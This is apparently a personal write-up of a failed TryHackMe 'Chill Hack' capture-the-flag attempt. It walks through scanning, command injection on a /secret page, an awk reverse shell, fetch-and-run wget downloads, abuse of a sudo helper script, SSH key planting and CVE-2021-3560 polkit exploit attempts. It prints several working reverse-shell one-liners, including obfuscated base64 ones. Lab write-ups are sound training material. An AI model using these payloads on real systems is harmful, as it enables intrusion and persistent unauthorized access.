# Tryhackme - Chillhack I - Failed Attempt

Burned out from learning Active Directory, got recommended by Jael Koh that this is an easy CTF challenge I didn't realized what kind of rabbit hole that I got myself into.

This is a painful but necessary experience. Let's begin.

## 1. Enumeration:

With `autorecon` and `nmap` running, I got some information of what I'm dealing with to begin, along with `ffuf`:

```shell
┌──(kali㉿kali)-[~]
└─$ sudo $(which autorecon) -t target   
[sudo] password for kali: 
[*] Scanning target 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/22 on 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/80 on 10.10.126.168
[*] [10.10.126.168/all-tcp-ports] Discovered open port tcp/21 on 10.10.126.168
[*] [10.10.126.168/tcp/80/http/redirect-host-discovery] [-] No redirect detected at http://10.10.126.168:80/
[*] [10.10.126.168/tcp/80/http/vhost-enum] The target was not a hostname, nor was a hostname provided as an option. Skipping virtual host enumeration.
[*] [10.10.126.168/tcp/80/http/known-security] [tcp/80/http/known-security] There did not appear to be a .well-known/security.txt file in the webroot (/).
[*] [10.10.126.168/tcp/80/http/curl-robots] [tcp/80/http/curl-robots] There did not appear to be a robots.txt file in the webroot (/).
[*] 22:43:05 - There are 6 scans still running against 10.10.126.168
[*] 22:44:05 - There are 5 scans still running against 10.10.126.168
[*] 22:45:07 - There are 4 scans still running against 10.10.126.168
[*] 22:46:09 - There are 3 scans still running against 10.10.126.168
[*] 22:47:10 - There are 3 scans still running against 10.10.126.168
[*] 22:48:12 - There are 3 scans still running against 10.10.126.168
[*] 22:49:13 - There are 3 scans still running against 10.10.126.168
[*] 22:50:15 - There are 3 scans still running against 10.10.126.168
[*] 22:51:16 - There are 3 scans still running against 10.10.126.168
[*] 22:52:18 - There are 3 scans still running against 10.10.126.168
[*] 22:53:19 - There are 3 scans still running against 10.10.126.168
[*] 22:54:20 - There are 3 scans still running against 10.10.126.168
[*] 22:55:22 - There are 3 scans still running against 10.10.126.168
[*] 22:56:24 - There are 3 scans still running against 10.10.126.168
...
...
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -sV -A -O -p21,22,80 10.10.126.168
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 22:46 +07
Nmap scan report for 10.10.126.168 (10.10.126.168)
Host is up (0.29s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.135.134
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e0:11:08:fd:55:35:e1:9b:26:35:33:64:ba:1e:ae:d6 (RSA)
|   256 cc:8d:5e:ac:00:e0:f8:1c:cd:86:c0:91:f1:2d:1c:4c (ECDSA)
|_  256 f2:83:32:96:bd:84:72:80:ec:1d:57:90:66:2f:a8:13 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Game Info
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 (99%), Linux 3.2 - 4.14 (96%), Linux 4.15 - 5.19 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (95%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.13 (94%), Linux 5.0 - 5.14 (94%), Android 9 - 10 (Linux 4.9 - 4.14) (93%), Android 10 - 12 (Linux 4.14 - 4.19) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   295.24 ms 10.11.0.1 (10.11.0.1)
2   295.86 ms 10.10.126.168 (10.10.126.168)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.78 seconds
...
...
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '.php' -u "http://10.10.126.168:80/FUZZ" -t 40

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.126.168:80/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 338ms]
                        [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 340ms]
images                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 1571ms]
contact.php             [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 2541ms]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10, Duration: 297ms]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 311ms]
fonts                   [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 297ms]
secret                  [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 304ms]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 270ms]
                        [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 270ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 243ms]
:: Progress: [441094/441094] :: Job [1/1] :: 132 req/sec :: Duration: [0:51:30] :: Errors: 0 ::
...                                                                                ...                                                             
┌──(kali㉿kali)-[~]
└─$ ffuf -ic -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e '' -u "http://10.10.126.168:80/FUZZ.html" -t 40 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.126.168:80/FUZZ.html
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

                        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 300ms]
index                   [Status: 200, Size: 35184, Words: 16992, Lines: 644, Duration: 299ms]
news                    [Status: 200, Size: 19718, Words: 9096, Lines: 331, Duration: 828ms]
contact                 [Status: 200, Size: 18301, Words: 8553, Lines: 307, Duration: 2671ms]
about                   [Status: 200, Size: 21339, Words: 9838, Lines: 338, Duration: 3657ms]
blog                    [Status: 200, Size: 30279, Words: 15218, Lines: 544, Duration: 4764ms]
team                    [Status: 200, Size: 19868, Words: 9364, Lines: 359, Duration: 301ms]
                        [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 237ms]
:: Progress: [220547/220547] :: Job [1/1] :: 164 req/sec :: Duration: [0:24:39] :: Errors: 0 ::

┌──(kali㉿kali)-[~]
└─$ 

```

Now, I quickly go over and check the website, I notice there's a command execution on `/secret`. With a help from a friend, I quickly go over some shell and command:

```shell
bash -i >& /dev/tcp/[Attack_Box_IP]/4444 0>&1
echo d2hvYW1p | base64 -d | sh
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.11.135.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh"])'
mkfifo /tmp/p; /bin/sh -i < /tmp/p 2>&1 | nc 10.11.135.134 4444 > /tmp/p
echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoIjEwLjExLjEzNS4xMzQiLDQ0NDQpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwpKTtzdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIl0pJw== | base64 -d | python3
...
...
```

All of them got filtered, I figured `python`, `python3`, `nc`, `bash`, `sh` got filtered server side.

With some suggestion, I tried:

```
which tclsh
which awk
which node
which lua
```

I got a response from `which awk` so I decided to go with this payload:

```awk
awk 'BEGIN{s="/inet/tcp/0/10.11.135.134/4444";while(1){do{printf "sh> " |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c);}}while(c!="exit");close(s);}}'
```

And I got the reverse shell

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 34351
sh> python -c 'import pty; pty.spawn("/bin/bash")'
sh> ls 
images
index.php
sh> whoami
www-data
sh> sudo -l
Matching Defaults entries for www-data on ip-10-10-126-168:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-126-168:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
sh> cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
sh> sudo /home/appar/.helpline.sh
sh> whoami
www-data
sh> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
```

As this shell is quite horrible, lack of out put and got locked in place, can't move out of `/var/www/html/secret`, I tried adjust the `awk` payload:

```awk
awk 'BEGIN{s="/inet/tcp/0/10.11.135.134/4444";while(1){do{printf "bash> " |& s;s |& getline c;if(c){while((c |& getline)>0)print $0 |& s;close(c);}}while(c!="exit");close(s);}}'
```

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 38681
bash> ls
images
index.php
bash> sudo /home/appar/.helpline.sh
bash> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
bash> ls -a /home/apaar
.
..
.bash_history
.bash_logout
.bashrc
.cache
.gnupg
.helpline.sh
.profile
.ssh
.viminfo
local.txt
bash> grep -RIn --exclude-dir={proc,sys,dev,run} -E '^[[:alnum:]._-]{1,30}:[[:graph:]]{1,30}$' / 2>/dev/null | head
```

Still that's bad payload.

Anyway, moving on. I started think of away to get a decent bash shell by `wget`.

I made a big mistake using this ~~wget url > /tmp/linpeas.sh~~. This is a big mistake. You are not suppose to use `>` in `wget`. The `>` operator grabbed **wget’s progress text**, not the file.\
Result → zero-byte file ⇒ nothing to execute ⇒ connection closes as soon as the stub exits.

I organized my thoughts and proceed with downloading the `shell`:

```shell
bash> wget http://10.11.135.134:80/chillhack.sh -O /tmp/x           
bash> chmod +x /tmp/x
bash> /tmp/x
```

I got a decent shell now:

```shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 6666                                              
listening on [any] 6666 ...
connect to [10.11.135.134] from (UNKNOWN) [10.10.126.168] 56742
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-10-126-168:/var/www/html/secret$ cd /tmp
cd /tmp
www-data@ip-10-10-126-168:/tmp$ wget http://10.11.135.134:80/linpeas.sh
wget http://10.11.135.134:80/linpeas.sh
--2025-06-12 17:21:22--  http://10.11.135.134/linpeas.sh
Connecting to 10.11.135.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 839046 (819K) [text/x-sh]
Saving to: 'linpeas.sh.1'

     0K .......... .......... .......... .......... ..........  6% 81.8K 9s
    50K .......... .......... .......... .......... .......... 12%  165K 7s
   100K .......... .......... .......... .......... .......... 18%  163K 5s
   150K .......... .......... .......... .......... .......... 24% 7.70M 4s
   200K .......... .......... .......... .......... .......... 30% 6.29M 3s
   250K .......... .......... .......... .......... .......... 36%  172K 3s
   300K .......... .......... .......... .......... .......... 42% 7.30M 2s
   350K .......... .......... .......... .......... .......... 48% 9.84M 2s
   400K .......... .......... .......... .......... .......... 54% 4.52M 1s
   450K .......... .......... .......... .......... .......... 61%  344M 1s
   500K .......... .......... .......... .......... .......... 67%  174K 1s
   550K .......... .......... .......... .......... .......... 73%  349M 1s
   600K .......... .......... .......... .......... .......... 79% 11.1M 0s
   650K .......... .......... .......... .......... .......... 85% 4.26M 0s
   700K .......... .......... .......... .......... .......... 91%  163K 0s
   750K .......... .......... .......... .......... .......... 97%  357M 0s
   800K .......... .........                                  100% 75.1M=2.2s

2025-06-12 17:21:24 (380 KB/s) - 'linpeas.sh.1' saved [839046/839046]

www-data@ip-10-10-126-168:/tmp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<mp$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-10-126-168:/tmp$ ls
ls
chill       chillhack.elf  chillhack2.sh  linpeas.sh.1  sh.perm  x
chill.file  chillhack.sh   linpeas.sh     sh.link       shells
www-data@ip-10-10-126-168:/tmp$ ./linpeas.sh.1
./linpeas.sh.1
bash: ./linpeas.sh.1: Permission denied
www-data@ip-10-10-126-168:/tmp$ chmod +x linpeas.sh.1
chmod +x linpeas.sh.1
www-data@ip-10-10-126-168:/tmp$ ./linpeas.sh.1
./linpeas.sh.1
...
...
Vulnerable to CVE-2021-3560

```

## **2. Here the pain began...**

I dived deep into the CVE-2021-3560 rabbit hole.

I tried every payload out there:

```payload
https://github.com/pashayogi/ROOT-CVE-2021-3560/blob/main/root.sh
https://www.exploit-db.com/exploits/50011
https://github.com/UNICORDev/exploit-CVE-2021-3560/blob/main/exploit-CVE-2021-3560.py
...
...
```

The more I tried the harder I fall into the rabbit hole.

So I stopped and look for write up, and a whole can of worms pop open. This room is not as simple as it was labeled.

I asked my friend about this code:

```shell
sh> cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
```

The thing about this code is that, there's no filtering for input, it's just execute `msg` through `$msg 2>/dev/null`

Looking into the file with `-lah`

```shell
bash> ls -lah /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct  4  2020 /home/apaar/.helpline.sh
```

This file is owned by `apaar` so we can only get `apaap`'s shell, we can't get `root`'s shell here. Let's continue.

```shell
www-data@ip-10-10-126-168:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh
<html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: i
i
Hello user! I am i,  Please enter your message: /bin/bash
/bin/bash


id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
apaar@ip-10-10-126-168:/var/www/html/secret$
```

## **At that point of the night, it was 2AM, I decide to read some writeups in a serious way. Reading through writeups I realized I don't know as much as thought I did.**

There's a small writeup trick that allowed me to `ssh` to the machine by that, I can pivot the internal website that I didn't notice while reading `Linpeas.sh` report. But I was stubborn. I decided to force `CVE-2021-3560` to work.

I start by generating a set of `ssh` key pair. And send the public key to `apaar`'s side:

```shell
┌──(kali㉿kali)-[~]
└─$ ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): id_rsa_apaar
Enter passphrase for "id_rsa_apaar" (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in id_rsa_apaar
Your public key has been saved in id_rsa_apaar.pub
The key fingerprint is:
SHA256:FWF9Lv49OEzQinq4Xv9NmgdxWL05c05pPG+3Yv/76fs kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|          +o    .|
|         . .. ...|
|          . .o+ +|
|         . ..+.@o|
|        S ..o.+o*|
|         . ..o  =|
|        o.  o.o+o|
|       o...  **+o|
|      .oo  .o+*BE|
+----[SHA256]-----+

┌──(kali㉿kali)-[~]
└─$ mousepad id_rsa_apaar.pub
```

```shell
apaar@ip-10-10-126-168:~$ echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCVCLFypXMshUlVLz94oEb9FvJ+r6+IMe9tjf6zC/reoYgd4s9FmIVhtHimr0yIFH8dbURh6n15PbxSbpyGWxCQlS44dJmRcTXasJwl7OCdZxXtloINnmFOEaiXWJXnO4NVcDnIPECr3S9O5TaTDCnOBk0uc2hGsbHPcs/JBeVUGIXJhPh+EH0NFR1uN76fp6hkFt3vOU0N2UCnOiavYjCyJlSTFHdRJTBHfHCeiDEpNESzI3ohvaOZqf4/LXZpCtTFtrTAkeqRxLgcoxmmJlCuD/wkq0rXyFCwsJrczLRBGjGIcmHUysn+/vBJs92HVAD2o0DodWsAeMb5gXEhzcgoOuNe1MMGtBz16dOXag8bQ8aVOM8el1xKNo1aB53oKWOW4+YQTNnVGOEuDEg33+TD+dFy8iaiuqsfvI1g3uzh9FS05NXQGWhTaZoV0r+cYiqT0ZBxEP7tk2lQaHCuV7pV+y2ApgDL4dkFR9tnhthl2d+bjTd3fUrijkT6khRzuK8= kali@kali >> /home/apaar/.ssh/authorized_keys
<zuK8= kali@kali >> /home/apaar/.ssh/authorized_keys
apaar@ip-10-10-126-168:~$ ls -la
ls -la
total 52
drwxr-xr-x 6 apaar apaar 4096 Jun 12 19:30 .
drwxr-xr-x 6 root  root  4096 Jun 12 15:27 ..
-rw------- 1 apaar apaar    0 Oct  4  2020 .bash_history
-rw-r--r-- 1 apaar apaar  220 Oct  3  2020 .bash_logout
-rw-r--r-- 1 apaar apaar 3771 Oct  3  2020 .bashrc
drwx------ 2 apaar apaar 4096 Oct  3  2020 .cache
drwx------ 3 apaar apaar 4096 Jun 12 19:20 .gnupg
-rwxrwxr-x 1 apaar apaar  286 Oct  4  2020 .helpline.sh
-rw-r--r-- 1 apaar apaar  807 Oct  3  2020 .profile
drwxr-xr-x 2 apaar apaar 4096 Jun 12 19:01 .ssh #Hiden .ssh directory
-rw------- 1 apaar apaar  817 Oct  3  2020 .viminfo
-rw-rw---- 1 apaar apaar   46 Oct  4  2020 local.txt
```

Then I `ssh` to apaar:

```shell
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa_apaar apaar@10.10.126.168 
apaar@10.10.126.168's password: 

┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa_apaar apaar@10.10.126.168
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-138-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Thu 12 Jun 2025 07:37:15 PM UTC

  System load:  0.0                Processes:             172
  Usage of /:   35.7% of 18.53GB   Users logged in:       0
  Memory usage: 55%                IPv4 address for eth0: 10.10.126.168
  Swap usage:   0%


Expanded Security Maintenance for Infrastructure is not enabled.

0 updates can be applied immediately.

Enable ESM Infra to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

Your Hardware Enablement Stack (HWE) is supported until April 2025.

Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
apaar@ip-10-10-126-168:~$
```

I was very stubborn so I decided to give the `CVE-2021-3560` a try one last time.

```shell
apaar@ip-10-10-126-168:~$ pwd
/home/apaar
apaar@ip-10-10-126-168:~$ cd /temp
-bash: cd: /temp: No such file or directory
apaar@ip-10-10-126-168:~$ cd /tmp
apaar@ip-10-10-126-168:/tmp$ wget http://10.11.135.134:80/root.sh
--2025-06-12 19:43:12--  http://10.11.135.134/root.sh
Connecting to 10.11.135.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253 (3.2K) [text/x-sh]
Saving to: ‘root.sh’

root.sh                                                    100%[========================================================================================================================================>]   3.18K  --.-KB/s    in 0.001s  

2025-06-12 19:43:12 (3.66 MB/s) - ‘root.sh’ saved [3253/3253]

apaar@ip-10-10-126-168:/tmp$ chmod +x root.sh
apaar@ip-10-10-126-168:/tmp$ ./root.sh
[*] Vulnerable version of polkit found
[*] Determining dbus-send timing
[*] Attempting to create account


^Capaar@ip-10-10-126-168:/tmp$ exit
```

At that point I gave up on this CTF. This CTF deserve a re-run.

CTF ended. Flag found: `1/2`